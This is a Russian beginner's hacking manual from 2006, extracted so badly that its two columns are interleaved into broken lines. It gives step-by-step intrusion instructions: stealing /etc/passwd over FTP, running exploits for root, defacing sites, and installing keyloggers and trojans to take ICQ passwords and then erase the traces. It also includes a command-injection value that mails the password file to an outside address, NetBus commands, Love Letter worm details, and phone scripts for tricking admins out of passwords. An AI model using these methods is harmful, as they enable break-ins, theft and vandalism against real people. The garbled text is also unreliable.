Академический Документы
Профессиональный Документы
Культура Документы
3
ББК 32.973.26018.2
Л363
Левин М.
Л363 Хакинг с самого начала: Методы и
секреты.
М.: Бук
пресс, 2006.
224 с.
Хакинг с самого начала:
Методы и секреты С помощью этой книги Вы поймете как стать начинающим
хакером.
УДК 681.3
ББК 32.973.26018.2
Москва
■
Введение в хакинг ■
Linux
RedHat — для начинающего
пользователя UNIX
■ SlackWare — для более
опытного пользователя UNIX
Начинающему хакеру
■ FreeBSD — для людей, которые
Для начала давайте определимся, кто уже довольно свободно
такой хакер. чувствуют себя в UNIX
Хакер — это человек, который Постоянная дилемма: что лучше
досконально знает организацию сети, Linux или проект BSD (FreeBSD,
операционные системы сети, языки OpenBSD, NetBSD…)? Каждый выбирает
программирования. для себя.
Так же хакер знает, как построены Каждая из них имеет свои
сетевые протоколы (например, TCP/IP). И преимущества и недостатки.
еще очень многое.
А теперь ближе к взлому…
Почему хакеры будут всегда?
Итак, вот список популярных в сети
Ответ прост — потому что все сервисов:
сделанное людьми — может ими же быть
взломано! А так же потому что всегда ■ ftp 21
будут администраторы с именем «ЛАМЕР ■ telnet 23
ДНЯ».
■ smtp 25
Итак начнем…
■ http 80
Для начала вам необходимо найти
дистрибутивы следующих сетевых ОС: ■ pop3 110
3 4
Хакинг с самого начала Хакинг с самого начала
7 8
Хакинг с самого начала Хакинг с самого начала
Здесь пишем ваш пароль для входа в ftp программу (т.е. обычно это директория
Internet. MUST_DIE). Вот и ищите его там, если
нет — то смотрите команду find.
И мы получаем что
то типа вот
этого (честно говоря очень маленькая Как ни жаль, но таких провайдеров
вероятность того, что ваш провайдер все меньше и меньше. Но они
настолько глуп, но с чем черт не шутит! существуют, и, к тому же, появляются
Один популярный сервер w3.dos.net новые!
взломали еще
Не огорчайтесь, если у вас ничего не
проще — подключились к сервису IIS
вышло! Это только начало…
(Internet Information Server), а там вообще
не было пароля! Правило номер один: главное —
стремление и желание найти «дырки», а
Так вот — продолжаем.
так же умение ими воспользоваться.
Видим:
Directory /home/usr/ваш_логин not Как же надо хакать и с чего начать?
found
Logging in "/" Для начала попробуй
Вот и все, считайте, что взлом просканировать несколько IP по разным
окончен. портам. Ты увидишь, что некоторые
компьютеры отвечают, а некоторые нет.
Просто напишите строку: Некоторые компьютеры ответят и только
ftp> (писать здесь) get /etc/passwd некоторые, возможно некоторые из
Вы получили файл с паролями. найденных будут плохо защищенными и
«Куда?» — спросите вы. Это легко узнать, ждать пока ты их взломаешь.
запустив команду find под MUST_DIE и Небольшое отступление: Ты скажешь
искать нужно passwd файл (без что это за фигня такая — порты и прочая
расширения). Обычно он записывается в лабуда? Порт — это адрес определенного
ту директорию, из которой вы запустили сервиса, запущенного на данном
9 10
Хакинг с самого начала Хакинг с самого начала
свои порты.
нибудь другие порты, то при большом
Как только человек выходит в везении сервер тебе скажет что ты
Internet, он сразу же получает свой приконнектился удачно и ты сможешь
уникальный IP
адрес (например, ppp1033 легко найти нужную комбинацию. Это
5.dialup.glasnet.ru). После этого любой самый простой способ взламывания
желающий может воспользоваться твоими серверов. Можно проявить себя как
ресурсами (которые доступны) также, как «Белый хакер в шляпе» — посылаешь
и тебе ресурсы других. Для того, чтобы письмо сисадмину и уходишь с этого
воспользоваться услугами, необходимо сервера (типа незаконно и все в таком
указать IP:port (к примеру, 195.34.34.30:21 духе). Ну а если ты никогда не слышал
— для того, чтобы попасть на FTP сервер про
zone.ru). 273
275 статьи УК РФ, то… ну, я думаю,
ты сам догадаешься, что тебе делать…
Теперь ты, возможно,
приконнектишься к какому
нибудь Небольшое отступление: Сервак —
серваку к порту 23 (порт telnet) (Пуск ➪ компьютер, подключенный к Internet.
выполнить ➪ telnet ip:port. Если не Сервис — программа, запущенная на
указывать порт, то по умолчанию это 23 серваке на определенном порту. Каждая
порт). Если ты нормально такая программа должна отвечать на
приконнектишься, то увидишь определенные программы. Если ты дашь
приглашение с просьбой ввести логин и этой программе правильную команду, то
пароль. Но поскольку ты не знаешь она должна что
то сделать для тебя.
11 12
Хакинг с самого начала Хакинг с самого начала
13 14
Хакинг с самого начала Хакинг с самого начала
15 16
Хакинг с самого начала Хакинг с самого начала
19 20
Хакинг с самого начала Хакинг с самого начала
23 24
Хакинг с самого начала Хакинг с самого начала
25 26
Хакинг с самого начала Хакинг с самого начала
27 28
Хакинг с самого начала Хакинг с самого начала
сервере. 5000
4900
4800… 0 100 200… 5000).
Вот списки популярных exploit’ов:
Не удивляйтесь, если все эти шаги
■ ftp — wu
ftp2.42; wu
ftp2.60
не привели к желаемому результату.
■ qpopper Просто скорее всего сервер, который вы
■ пытаетесь атаковать, уже пропатчили…
proftp
Патч (patch) — небольшая прога,
И еще тысячи им подобные.
которая закрывает известные ей «дыры»
Большинство exploit написаны в (bugs) в системе безопасности.
виде openSource (открытый код), а так же
Вот пока и все, что вам нужно знать
на языке программирования С++.
про эксплоит.
Большинство из них требует для
запуска UNIX. Вот простенький пример
использования exploit (после того как вы Что такое root?
его списали и распаковали) UNIX wu
Root — это главная цель всех
ftp2.42 (подразумевается что вы root): взломов. Root — это корень сервера, root
— это суперпользователь (super
user),
#gcc имя файла с окончанием .с который может делать с компьютером все,
#./a.out имя файла после что ему захочется!
компиляции (если не было ошибок при
ней) Как получить root? Получить root
очень сложно (конечно, если не
Нас спрашивают IP
адрес сервера, учитывать, что есть администраторы —
который мы атакуем и offset — параметр, полные ламера, я порой удивляюсь — за
зависящий от компилятора, что им платят деньги).
использованного при создании сервиса
(демона) на удаленной машине (в данном
29 30
Хакинг с самого начала Хакинг с самого начала
Так что же делать? Вот здесь как раз самые важные настройки сервера), есть
и приходят на помощь известные нам файл ftpusers (в BSDI UNIX), так по
exploit. Кстати, возможно и вы сможете default (умолчанию) root доступ к порту 21
когда
то написать exploit. Что для этого (ftp) запрещен. Вы с помощью редактора
нужно? Много пива, знание C++, блок joe (на удаленной машине) редактируете
сигарет, дни и ночи, проведенные за этот файл и разрешаете root использовать
изучением кода демона. ftp.
Цель (большинства) exploit — в Как? Просто поставьте перед root
remote access (удаленном доступе), т.е. знак #, а затем запишитесь (Ctrl+k, затем
запустив правильно exploit (при условии, x).
что атакуемый сервер не пропатчен против
Пример (вы — root):
него и версии совпадают) вы в
большинстве случаев получите remote #joe /etc/ftpusers
access. В редакторе вставляем перед root
символ #, затем жмем Ctrl+k, а затем x.
Что дальше?
Все, файл изменен, теперь можно
Ну вот, мы забрались в систему
выходить из системы (а то вдруг вас админ
(давайте просто представим это), что же
просечет?).
теперь делать?
Кстати, имея root доступ к серверу,
1. Мы знаем систему (версию,
вы можете изменить пароль к root и даже
название).
отформатировать жесткий диск… Вот было
2. Мы нашли дырку в ней. бы смешно посмотреть на администратора
сервера, который придя на работу (после
3. Мы обязательно продумали, что
большого бодуна) увидит, что жесткий
делать дальше перед взломом.
диск абсолютно чистый!
Так вот, многие взломы в сети
Теперь пишем:
заканчиваются изменением странички.
Значит так: в каталоге /etc (где находятся #ftp ip_address or host_name
31 32
Хакинг с самого начала Хакинг с самого начала
33 34
Хакинг с самого начала Хакинг с самого начала
35 36
Хакинг с самого начала Хакинг с самого начала
то типа:
или
This site hacked by Vasya
/usr/local/etc/apache
Жмем Ctrl+k, а затем x.
Чаще всего (исходя из
вышеописанного) apache DocumentRott Так же в редакторе joe вы можете
(home_dir) находится: написать что угодно.
/www
или Убить «демонов»!
/home/www
Демон — это процесс в UNIX
или системе, который предоставляет вам
/usr/local/www некоторые услуги. Например, в Internet:
Пишем: ■ Ftpd (ftp daemon) port 21
#cd home_dir
■ Telnetd (telnet daemon) port 23
где home_dir — каталог www. Затем
удаляем index.htm или index.html. Как ■ Smtpd (smtp daemon) port 25
узнать какой? ■ Httpd (http daemon) port 80
Пишем: ■ Pop3d (pop3 daemon) port 110
#ls full | more
37 38
Хакинг с самого начала Хакинг с самого начала
39 40
Хакинг с самого начала Хакинг с самого начала
41 42
Хакинг с самого начала Хакинг с самого начала
43 44
Хакинг с самого начала Хакинг с самого начала
45 46
Хакинг с самого начала Хакинг с самого начала
49 50
Хакинг с самого начала Хакинг с самого начала
UIN номером и чтоб все поняли что секьюрити у пользователя тем быстрее
миллионные числа это не серьезно, вот получается полный доступ к его пассворду.
посмотрите на меня — я был одним из Иными словами, чем выше уровень
первых пользователей или неважно кем я защиты — тем больше вероятность, что
был, важнее кем я стал. А как я стал, жертва введет пассворд для того чтоб
сейчас расскажу. использовать ICQ. Ставится троян для
облегчения дальнейшего доступа и
На мой взгляд самый реальный и
перезагружается машина (перезагрузка
предельно простой способ: исследование
машины зависит от многочисленных
Internet Сервис Провайдера и соседских
факторов, от операционной системы до
сетей на предмет тех пользователей, кто
скорости подсоединения к сети). При
имеет открытые зашаренные диски и не
благоприятном стечении обстоятельств
защитили их пассвордом. Находятся такие
получение пассворда к выбранному UINу
люди программой «Легион». Из пяти сотен
займет десять, от силы двадцать, минут —
проверенных компьютеров более тридцати
ровно столько, сколько потребуется на
имело открытым диск C:\ с полным
reboot, дозвонку на провайдера, запуск
доступом. Все они являлись
ICQ и введение пассворда, далее берется
пользователями ICQ. Выбор UINов просто
лог созданный keyboard sniffer и читается
потрясающий — от 20xxxx до 80xxxxx.
пассворд. Все.
Смотрим C:\Program Files\ICQ\UIN и
видим number.uin — внутри этого файла Более того, возможность того что
всего лишь несколько строк с после всего этого останутся какие
либо
информацией о номере, имени, нике и e
логи или иные следы взлома ничтожно
mail адресе хозяина. Если номер мала: уничтожается лог, sniffer и троян.
устраивает, ставится keyboard sniffer
который запишет в лог все то, что Вы что, уже уходите? А что, у
пользователь введет в клавиатуры. вас еще что.то осталось?
ICQ имеет три уровня секьюрити — Начнем с того, что если вы
Low, Medium и High. Чем выше уровень зарегистрировали аккаунт и забыли к нему
пассворд, достаточно заявить свой UIN на
51 52
Хакинг с самого начала Хакинг с самого начала
53 54
Хакинг с самого начала Хакинг с самого начала
55 56
Хакинг с самого начала Хакинг с самого начала
57 58
Хакинг с самого начала Хакинг с самого начала
59 60
Хакинг с самого начала Хакинг с самого начала
HKEY_LOCAL_MACHINE\Software\Micro
нибудь, поддерживающий 16 и 32
х
soft\Windows\CurrentVersion\Run. Там
битные современные приложения
смотрите, не грузятся ли вместе с вашим
(наиболее часто встречаются в сети
виндовсом программы
паразиты, которые
Windows95/98)
могут являться причиной утечки
информации через Internet или локальную 2. Вы не знаете никакого языка, но
сеть! Если вы плохо понимаете, о чем я вы очень хотите стать Хакером. Самый
говорю — то читайте следующие пункты и многочисленный вид людей, населяющих
вам все станет ясно! сеть. Итак, приступим ко взлому, господа.
65 66
Хакинг с самого начала Хакинг с самого начала
67 68
Хакинг с самого начала Хакинг с самого начала
69 70
Хакинг с самого начала Хакинг с самого начала
71 72
Хакинг с самого начала Хакинг с самого начала
Netbus.exe Screendump
Клиент. Снять Screen Shot с экрана монитора
Описание команд Net Bus: Get info
Host name/IP Информация о компьютере
Хост на котором запущен сервер Play sound
Port Проиграть музыку
Порт сервера, по умолчанию 12345 Exit Windows
Serevr admin Различные способы перезагрузки
компьютера
Различные настройки управления
удаленным компьютером. Пассворд, порт Send text
и т.д. Послать текст
Open CD.ROM Active winds
Открыть CD
ROM Запущенные программы и действия с
Show image ними
Показать картинку Mouse pos
Swap mouse Координаты мышки
Поменять кнопки мыши Listen
Start program Просмотр нажатия на клавиши On
73 74
Хакинг с самого начала Хакинг с самого начала
75 76
Хакинг с самого начала Хакинг с самого начала
77 78
Хакинг с самого начала Хакинг с самого начала
79 80
Хакинг с самого начала Хакинг с самого начала
81 82
Хакинг с самого начала Хакинг с самого начала
83 84
Хакинг с самого начала Хакинг с самого начала
— по
русcки. Словом, ничего интересного. смогли узнать и о сервисах самого
Но вот сам факт взлома! А юзеров
то на провайдера, о которых он почему
то
сервере сотни, поэтому это увлекательное публично умалчивает. Например, мы ясно
путешествие можно только продолжать и видим, что сервер новостей установлен:
продолжать! news USENET News,,, /var/news/etc
Ладно, все это очень интересно, но Но если просканировать порты
как же автор утянул сей ценный стуфф? И сервера (любой программой, например,
не боится ли он, что к в какой
то момент NetInfo), то наc грязно обломают и
его прикроют? Разумеется, нет, и я готов скажут, что никаких тут ньюсов нет.
поделиться с вами своим ББС (большим
Ну, как дорваться до ньюсов, это
буржуинским секретом). Ведь никакого
тема отдельного разговора, а вот
взлома автор не совершал. Файл
простенький сендмайл можно
Etc/password доступен с теми правами,
использовать и так. Порты открытые —
которые ему (да и любому другому
как на POP3 (то есть чтение почты), так
пользователю) выделил администратор. И
на SMTP (то есть ее отправку).
нечего огород городить! Etc/password — это
общедоступный ресурс — во всяком случае Впрочем, и почту и ньюсы ломать не
на чтение и всякий может его поглядеть — интересно — другое дело еще раз
было бы желание! А взглянуть на etc/password! Только как?
Попробует подрубаться по ftp (ну, а как
администратор вовсе не лох — ведь же иначе
то).
паролей в etc/password нет, как мы в этом
Набираем в браузере
в последствии убедимся.
«ftp://ftp.werbprovider.com» — так нас
Однако, как мы выяснили, что грязно пошлют подальше. Да и если бы не
пароли для взлома не всегда обязательны, послали, — все равно бы мы ничего не
— достаточно вполне знать логины и смогли увидеть.
проявить малость интуиции и
Ведь все директории, которые видны
находчивости. К тому же мы многое
по WWW или FTP — это виртуальные
87 88
Хакинг с самого начала Хакинг с самого начала
89 90
Хакинг с самого начала Хакинг с самого начала
95 96
Хакинг с самого начала Хакинг с самого начала
97 98
Хакинг с самого начала Хакинг с самого начала
99 100
Хакинг с самого начала Хакинг с самого начала
исполнением скриптов.
конференцию, ну и домен третьего уровня
типа «http://yourname.hypermart.net/». Очень
очень
очень увешан
Впрочем, домен регистрируется в течении баннерами, но зато дает домен третьего
нескольких часов, но доступ типа уровня и самое главное, содержит
«http://server26.hypermart.net/ kpnc» офигенное число дыр, которые сразу не
появляется тут же. заткнут (не успеют) — поэтому
тренироваться начинающим хакерам на
Так же доступен по FTP, но очень
нем самое
то!
неплохо защищен, и начинать с него не
советую, хотя в остальных отношениях — ProHosting
рульный сервак. Довольно неплохой сервер, быстрый
Правда есть одно «но» — чтобы и приятный. Регистрирует ваш домен в
получить доступ, нужно ввести код течение четырех часов. Но никаких
подтверждения, высылаемый вам на e
дополнительных сервисов тут нет.
mail. Вот тут вся и
JustFree
загвоздка — все бесплатные e
mail
отметаются сервером, как саксь и маст Дает доступ к cgi
bin и Шеллу.
дай. В том числе и часть платных Очень тормозит, но это один из очень
российских тоже, например, ZMAIL.RU и немногих серверов, дающий халявный
TELEMEDNET.RU. Поэтому придется Шелл, так что придется с этим
извращаться и где
то искать платный примириться.
ящик или иметь договоренность с его
автором, на изыску писем.
103 104
Хакинг с самого начала Хакинг с самого начала
105 106
Хакинг с самого начала Хакинг с самого начала
файл
то (известно какой) утянуть хочется! Хитрость 3
Можно ли это сделать? Иногда да, только Обратите внимание на следующие
нужно поискать дырки в существующих строки скрипта:
скриптах. ($login, $pass, $uid, $gid, $name,
А очень часто бывает так, что они $home_dir, $shell) = split(':');
есть, только незаметны с первого взгляда.
Вот пусть, например, на сервере где
то print "<tr>
есть какой
то скрипт (сейчас не важно print "<td>
какой и где), но который запрашивает у print "$login";
пользователя имя файла, которое надлежит print "<td>
открыть (очень часто бывает в различных print "$name";
web
почтовых ящиках, да и в других print "<td>
случаях то же). print "$home_dir"l
То есть пароль считывается из
Тогда можно ввести что
то вроде
файла, но не выводится?! Истинно так.
«|mail VasyaPupukin@mail.com </etc/passwd»,
Если хотите его увидеть, то добавьте еще
разумеется без кавычек, как мы имеем
одну строчку в скрипт. Догадайтесь, как
неплохие шансы получить этот файл на
она должна выглядеть — уверяю, вас это
«дом», что называется с доставкой.
не оставит равнодушными!
Далеко не все разработчики
скриптов учитывают такую ситуацию. Приложение 1. Скрипт hack.pl
Поэтому, однозначно, дыры в системах #!/usr/local/bin/perl
безопасности есть и они вокруг нас! Надо print "Contenttype: text/html\n\n";
только хорошо поискать и не боятся print "<BODY TEXT=#342E27
экспериментировать! BGCOLOR=#D4D3C7
BACKGROUND=http://dore.on.ru/kpnc/imag
es/BACK1.JPG>";
print "≶IMG SRC=
http://dore.on.ru/kpnc/images/PH.JPG><
111 112
Хакинг с самого начала Хакинг с самого начала
113 114
Хакинг с самого начала Хакинг с самого начала
DG/UX UNICOS
/etc/tcb/aa/user/ /etc/udb
EP/IX Как этим пользоваться? Очень
/etc/shadow просто — заменить путь в следующей
HP.UX
сточке скрипта на новый.
/.secure/etc/passwd open(PASS, "</etc/passwd") || die;
IRIX 5
/etc/shadow Советы системному
Linux 1.1 администратору
/etc/shadow
Каждый день по всему миру
OSF/1
взламываются компьютерные сети и
/etc/passwd[.dir|.pag]
сервера. Уровень этих атак различен.
SCO Unix #.2.x Вопреки общему представлению, что
/tcb/auth/files/<first letter большинство из них происходит из
за
username>/<username> слабых паролей, множество атак
SunOS4.1+c2 использует более сложный способ. Эти
/etc/security/passwd.adjunct способы менее известны и их трудно
обнаружить. Чтобы защититься от таких
проникновений, необходимо понимать их.
SunOS 5.0 Мы попытаемся пояснить некоторые из
/etc/shadow них…
System V Release 4.0
/etc/shadow Большинство книг и документов,
посвященных защите, смотрят на нее
System V Release 4.2 глазами администратора — человека,
/etc/security/ который сидит внутри системы и иногда
databaseUltrix 4 плохо представляет ее внешние границы.
/etc/auth[.dir|.pag] Давайте отойдем от привычных
115 116
Хакинг с самого начала Хакинг с самого начала
119 120
Хакинг с самого начала Хакинг с самого начала
121 122
Хакинг с самого начала Хакинг с самого начала
123 124
Хакинг с самого начала Хакинг с самого начала
125 126
Хакинг с самого начала Хакинг с самого начала
127 128
Хакинг с самого начала Хакинг с самого начала
129 130
Хакинг с самого начала Хакинг с самого начала
131 132
Хакинг с самого начала Хакинг с самого начала
133 134
Хакинг с самого начала Хакинг с самого начала
135 136
Хакинг с самого начала Хакинг с самого начала
137 138
Хакинг с самого начала Хакинг с самого начала
139 140
Хакинг с самого начала Хакинг с самого начала
141 142
Хакинг с самого начала Хакинг с самого начала
143 144
Хакинг с самого начала Хакинг с самого начала
145 146
Хакинг с самого начала Хакинг с самого начала
147 148
Хакинг с самого начала Хакинг с самого начала
149 150
Хакинг с самого начала Хакинг с самого начала
151 152
Хакинг с самого начала Хакинг с самого начала
153 154
Хакинг с самого начала Хакинг с самого начала
PGPMail служит для шифрования Вот так вот все просто. Но, надеюсь,
почтовых сообщений. что ты себе такой файл делать не будешь.
Для добавления строчек надо сделать все
Теперь прочистим реестр. Сделать
так же, только вместо слова Del написать
это достаточно легко. Просто удаляешь
слово Add и после адреса ключа
строчки со спертыми данными и все. Но
вписывать:
мы с тобой сейчас попробуем
автоматизировать этот процесс. Сначала 0,"параметр"
надо все это дело сохранить в каком
Но просто так ты инфы не
нибудь файле, после чего склепать из него запустишь. Допустим, у тебя INF
файл
два файла INF (для загрузки всего этого в называется CSU.INF (хотя я, конечно,
реестр и удаления из него). Для понимаю, что я обнаглел). Тогда его надо
автоматизации этой работы советую будет запускать командой:
скачать маленькую программку по адресу RUNDLL.EXE
http://www.xakep.ru/soft/5/reg2inf.exe. Как SETUPX.DLL,InstallHinfSection
склепать все ручонками, думаю, ты DefaultInstall 64 c:\csu.inf
знаешь. Например, чтобы INF
файл
Все. Больше мы — не твоя стартовая
удалял из твоего реестра запись о том, что
страничка. Дальше надо вытереть файлы
CSU — твоя домашняя страничка, код
USER.DA0 и SYSTEM.DA0 (это что
то
должен быть таким:
типа backup’а реестра). Я бы посоветовал
[Version] написать батник, убивающий эти файлы и
Signature="$…$" заодно прочищающий реестр. То есть,
LayoutFile=bla.inf если твой файл для вырезания строчек из
реестра называется CSU.INF, а для
[DefaultInstall] добавления в реестр инфы CSUADD.INF,
DelReg=del.Reg то батник будет выглядеть следующим
образом:
[del.Reg]
RUNDLL.EXE
HKCU,"SOFTWARE\Microsoft\Internet
SETUPX.DLL,InstallHinfSection
Explorer\main","Home Page"
155 156
Хакинг с самого начала Хакинг с самого начала
163 164
Хакинг с самого начала Хакинг с самого начала
167 168
Хакинг с самого начала Хакинг с самого начала
получения доступа к ним надо нажать Map и прокси для LAN поддерживают NetBios.
Drive, а после успешного монтирования При подключении через модем убедитесь,
диск появится как сетевой в стандартном что программа верно настроена.
эксплорере Windows.
Legion находит не все хосты в диапазоне IP
Попробуйте поставить более
медленную скорость соединения.
Регулирование скорости определяет время,
отведенное удаленной машине для ответа.
Если удаленный компьютер перегружен
или слишком медленно работает, он
может быть не включен в отчет.
Legion не работает под NT5
Legion не тестировался под NT5, вы
используете его на свой страх и риск.
Распределенные вычисления
Техническая информация. Для
использования программы рекомендуется Различные распределенные
NT4 Server или Workstation, но возможна и технологии получили широкое
работа под Windows 95/98. Минимальная распространение в Internet в силу
конфигурация — Pentium 100, 32 MB распределенной структуры самой Сети. И
RAM, Windows NT4 / Windows98, 28.8 kbps вполне закономерно, что их стали
modem.Возможные проблемы. применять и хакеры. Наверное, самым
невинным использованием таких
Legion не находит цели после NetBios технологий хакерами являются
сканирования
распределенные вычисления.
Если сканирование производится из Общеизвестно, что большую часть
LAN, убедитесь, что конфигурация firewall времени процессор домашнего компьютера
169 170
Хакинг с самого начала Хакинг с самого начала
171 172
Хакинг с самого начала Хакинг с самого начала
173 174
Хакинг с самого начала Хакинг с самого начала
175 176
Хакинг с самого начала Хакинг с самого начала
177 178
Хакинг с самого начала Хакинг с самого начала
181 182
Хакинг с самого начала Хакинг с самого начала
183 184
Хакинг с самого начала Хакинг с самого начала
RunServices\Win32DLL. А в папке ■
c:\windows\system он создает файлы http://www.skyinet.net/~angelcat
MSKernel32.vbs и LOVE
LETTER
FOR
/skladjflfdjghKJnwetry
YOU.TXT.vbs. DGFikjUIyqwerWe546786324hjk
4jnHHGbvbmKLJKjhkqj4w/
Запуск MSKernel32.vbs он
WIN
BUGSFIX.exe
прописывает в реестре по адресу
HKEY_LOCAL_MASCHINE\Software\Micr ■
osoft\CurrentVersion\ http://www.skyinet.net/~koichi/jf
RunServices\MSKernel32. 6TRjkcbGRpGqaq198vbFV
5hfFEkbopBdQZnmPOhfgER67b
Следующим его шагом является
3Vbvg/WIN
BUGSFIX.exe
рассылка самого себя всем адресатам
адресной книги. Файл, который надо ■
приаттачить он берет из http://www.skyinet.net/~chu/sdgf
c:\windows\system\LOVE
LETTER
FOR
hjksdfjklNBmnfgkKL
YOU.TXT.vbs. Сам файл не запускается, HjkqwtuHJBhAFSDGjkhYUgqwe
его прикладывают. Далее вирус ищет файл rasdjhPhjasfdglkNBhbqwebmznxc
WINFAT32.EXE и если такой имеется, он bvnmadshfgqw237461234iuy7thjg/
скачивает из Internet файл WIN
BUGSFIX.exe
WIN
BUGSFIX.EXE. Скачивается он с
Запуск прописывается в реестре по
четырех адресов в сети, которые уже
адресу
уничтожены доблестными хранителями
HKEY_LOCAL_MACHINE\Software\Micro
порядка:
soft\Windows\CurrentVersion\Run\WIN
187 188
Хакинг с самого начала Хакинг с самого начала
189 190
Хакинг с самого начала Хакинг с самого начала
191 192
Хакинг с самого начала Хакинг с самого начала
XXX — это Тема письма. Вообще type=button, submit, reset, text — это их
таких элементов много (например, copy, надпись или начальное значение), checked
from и т. д. Можно придумать свои — стоит ли флажок/включена ли
элементы, тогда они тоже будут видны про радиокнопка. Вот и все про формы, что я
просмотре информации о письме). хотел рассказать. Осталось только
отметить, что если у вас получаются
Последний параметр, который нам
вложенные кавычки (например:
пригодится — METHOD. Значений бывает
два (на самом деле их три, но третье почти action="mailto:heller@mail.ru?Subject=
никакой браузер не поддерживает): POST "CSU"")
и GET. POST — это когда отсылается то надо использовать разные кавычки
напрямую серверу, а GET — это когда (одинарные и двойные), а то получается,
названия форм и их значения просто что значение параметра закрывается
добавляются в конце адреса. Например, раньше времени, а дальше идет новый
если в форме прописано параметр.
ACTION=http://csu.ru/cgibin/xxx.cgi, и
Теперь о VBScript. Давайте
ка
если имеется два параметра: uname=heller
напишем примитивную программу, чтобы
passwd=xxxxxxxx, то браузер пройдет по
из верхнего поля текст копировался в
адресу http://csu.ru/cgi
нижнее. Вначале напишем поле формы:
bin/xxx.cgi?umane=heller&passwd=xxxxxxxx.
<html>
Теперь про вложенные тэги. Я <head> <! В тэге HEAD помещаются
расскажу только про один: <INPUT>. Его тэги, содержащие информацию о
параметры: type (тип INPUT’а. Например, документе, но не влияющие на
button — кнопка, reset — кнопка очистки отображение на экране >
формы, submit — кнопка отправки формы, <title>НАШ ПЕРВЫЙ VBSCRIPT</title>
text — текстовое поле, radio — <! Заголовок окна >
радиокнопка (такой круглый </head>
переключатель) и checkbox — флажок), <body>
name — имя, value — значение (для <form name=f1>
193 194
Хакинг с самого начала Хакинг с самого начала
195 196
Хакинг с самого начала Хакинг с самого начала
197 198
Хакинг с самого начала Хакинг с самого начала
199 200
Хакинг с самого начала Хакинг с самого начала
<html> v=cInt(v)
<head> if q<v then
<title>1 из 100</title> alert "Загаданное число меньше"
</head> end if
<body> if q>v then
<center> alert "Загаданное число больше"
<form name=f1> if q=v then
<input type=button name=b1 document.write ("Вы победили за
value="Загадать число" "&p&" ходов")
onclick=start()><br><br> end if
Введите число:<br> end sub
<input type=text name=t1> ></script>
<input tyep=button name=b2 </body>
value=Enter onclick=play()> </html>
</form>
</center> Программы, которые изменили
<script language="VBScript"><!
dim q мир
dim v
Хочу начать с такого понятия, как
dim p
«тотальная мода». К хаку это имеет
randomize
немалое отношение. Во
первых, взлом
sub start
делается чаще всего ради собственного
q=int(rnd(1)*100+1)
удовольствия. И если «хакер» услышал о
p=0
методе взлома (не очень сложном), то не
alert "Загадано число от 1 до 100"
грех воспользоваться этим методом и
end sub
повысить свою квалификацию. Даже если
sub play
этот метод существовал давно, но хакер в
p=p+1
силу не профессионального (в значении
v=document.f1.t1.value
специальности) увлечения взломом просто
201 202
Хакинг с самого начала Хакинг с самого начала
203 204
Хакинг с самого начала Хакинг с самого начала
205 206
Хакинг с самого начала Хакинг с самого начала
207 208
Хакинг с самого начала Хакинг с самого начала
нужен, если это вам под силу, бесплатный аккаунта, сообщении пароля, т.к. админ
доступ на 6 часов. располагает возможностями для
вычисления хакера, даже если он
–Через час?
пользовался ремейлером. Во время своего
–Такая спешка объясняется звонка, даже если имеется АОН, ты
ограничением во времени, которое нам можешь отвлечь админа и отбить желание
дал совет директоров. Мы оперативно тебя вычислить — и это зависит от твоего
связываемся с 40 Московскими мастерства.
провайдерами. Ваш — один из них, по
Следующий способ для определения
истечении проверки мы примем решение
пароля к логину. Представьте, звонит
и выберем окончательно. Вы в состоянии
девушка, в конце рабочего дня, и
оперативно предоставить доступ?
прикидывается лохушкой.
–Да конечно!
–Алло, это администратор?
На этом примере (может и
–Да, чем я могу помочь?
неумелом) наглядно показано, как для
собственной успешности провайдер –У вас там нигде не записано как
выделяет доступ солидной (только по зовут мою собачку?
видимости) фирме. Будет просто отлично
–Не понял???
если админу позвонит девушка с
приятным голосом. Но правда админ будет –Ну у вас на сайте есть такая штука
удивлён, зачем фирме — Диал
Ап, а не для тех кто забыл пароль. Я там ввела имя
выделенка. И ещё совет, если у тебя есть моей собачки, её зовут Фифи. А потом
друзья, занимающиеся подобного рода пароль забыла. Зашла на ваш сайт. И
звонками, то расспроси у них, у каких ввожу имя моей собаки: «ФИФИ»,
провайдеров админы более дырявые на «Фифи», «фифи», «ФиФи» — ничего не
предмет социнженерии. помогает.
По электронной почте лучше не –Ладно, ладно я всё понял. Какое
посылать админам просьбы о выдаче имя пользователя?
209 210
Хакинг с самого начала Хакинг с самого начала
211 212
Хакинг с самого начала Хакинг с самого начала
213 214
Хакинг с самого начала Хакинг с самого начала
215 216
Хакинг с самого начала Хакинг с самого начала
217 218
Хакинг с самого начала Хакинг с самого начала
Максим Степин
Windows: скрытые фишки
Материалы сайта 4prohack
Автор: Epsilon
http://www.4prohack.cjb.net
Шифруемся Перевод
Дмитрий Громов dgro@chromo.lgu.spb.su
Автор: Анатолий Ремнев
Маленькие хитрости твоего мыла
Пагер — брат автоответчика Крис Касперски
MOOF (moof@xakep.ru; http://AnyNews.da.ru)
Как сделать сетевого раба из Windows
Материалы сайта Hacker Team GrayFlint
hacker team@mail.ru
219 220
Cодержание Cодержание
221 222
Для Ваших заметок
Левин Максим
Хакинг с самого начала:
Методы и секреты
223